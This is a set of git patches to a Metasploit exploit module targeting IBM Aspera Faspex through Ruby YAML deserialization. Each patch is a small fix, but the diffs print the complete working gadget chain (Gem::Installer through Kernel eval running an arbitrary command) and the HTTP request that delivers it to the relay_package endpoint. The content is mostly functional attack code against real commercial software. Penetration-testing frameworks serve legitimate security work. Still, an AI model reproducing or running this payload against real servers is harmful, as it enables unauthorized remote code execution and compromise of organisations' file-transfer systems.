Jeffrey Martin --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index bbef8c80edc9..cf52ac973763 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -102,7 +102,7 @@ def execute_command(command, _opts = {}) ], "external_emails": "#{exploit}", "package_name": "assetnote_pack", - "package_note": "#{Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}", + "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}", "original_sender_name": "#{Rex::Text.rand_name()}", "package_uuid": "#{uuid}", "metadata_human_readable": "Yes", From 65f78ca8fdebbf78a1c35ad29d0a66241070aab8 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Mon, 22 May 2023 17:27:04 +0000 Subject: [PATCH 21/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index cf52ac973763..b2a164685a1c 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::EXE include Msf::Exploit::FileDropper - include Msf::Exploit::Remote::CheckModule include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From 6471007516bf1a45ac0b57ac31ba8c31ad067303 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Mon, 22 May 2023 17:27:17 +0000 Subject: [PATCH 22/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index b2a164685a1c..142afdc4ee63 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -129,6 +129,6 @@ def execute_command(command, _opts = {}) def exploit print_status('Exploiting...') - execute_cmdstager + execute_command(payload.encoded) end end From a336652c433c2922796bfcd629153208ab5e0809 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Fri, 14 Jul 2023 13:18:17 -0400 Subject: [PATCH 23/23] Minor fixes including payload encoding --- ..._aspera_faspex_rce_yaml_deserialization.rb | 96 +++++++++---------- 1 file changed, 48 insertions(+), 48 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 142afdc4ee63..0f114506cc30 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -64,61 +64,61 @@ def initialize(info = {}) } ) ) + register_options( + [OptString.new('TARGETURI', [ false, 'The base path for the IBM Aspera Faspex Application.', '/aspera/faspex'])] + ) end - def execute_command(command, _opts = {}) - exploit = %Q( ---- -- !ruby/object:Gem::Installer - i: x -- !ruby/object:Gem::SpecFetcher - i: y -- !ruby/object:Gem::Requirement - requirements: - !ruby/object:Gem::Package::TarReader - io: &1 !ruby/object:Net::BufferedIO - io: &1 !ruby/object:Gem::Package::TarReader::Entry - read: 0 - header: "pew" - debug_output: &1 !ruby/object:Net::WriteAdapter - socket: &1 !ruby/object:PrettyPrint - output: !ruby/object:Net::WriteAdapter - socket: &1 !ruby/module "Kernel" - method_id: :eval - newline: "throw `#{command}`" - buffer: {} - group_stack: - - !ruby/object:PrettyPrint::Group - break: true - method_id: :breakable - ).gsub(/\n/, '\n').gsub(/"/, '\"') + exploit = <<~EOT + --- + - !ruby/object:Gem::Installer + i: x + - !ruby/object:Gem::SpecFetcher + i: y + - !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "pew" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:PrettyPrint + output: !ruby/object:Net::WriteAdapter + socket: &1 !ruby/module "Kernel" + method_id: :eval + newline: "throw `#{command}`" + buffer: {} + group_stack: + - !ruby/object:PrettyPrint::Group + break: true + method_id: :breakable + EOT + uuid = SecureRandom.uuid - uuid = SecureRandom.uuid - payload = %Q({ - "package_file_list": [ - "/" - ], - "external_emails": "#{exploit}", - "package_name": "assetnote_pack", - "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}", - "original_sender_name": "#{Rex::Text.rand_name()}", - "package_uuid": "#{uuid}", - "metadata_human_readable": "Yes", - "forward": "pew", - "metadata_json": "{}", - "delivery_uuid": "#{uuid}", - "delivery_sender_name": "#{Rex::Text.rand_name()}", - "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}", - "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}", - "delete_after_download": true, - "delete_after_download_condition": "IDK" -}) + payload = { + "package_file_list[]": '/', + external_emails: exploit, + package_name: 'assetnote_pack', + package_note: Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15).to_s, + original_sender_name: Rex::Text.rand_name.to_s, + package_uuid: uuid.to_s, + metadata_human_readable: 'Yes', + forward: 'pew', + metadata_json: '{}', + delivery_uuid: uuid.to_s, + delivery_sender_name: Rex::Text.rand_name.to_s, + delivery_title: Rex::Text.rand_text_alphanumeric(4).to_s, + delivery_note: Rex::Text.rand_text_alphanumeric(12).to_s, + delete_after_download: true, + delete_after_download_condition: 'IDK' + } response = send_request_raw({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'), - 'data' => payload + 'uri' => normalize_uri(datastore['TARGETURI'], '/package_relay/relay_package'), + 'data' => URI.encode_www_form(payload) }) if response && response.body return response.body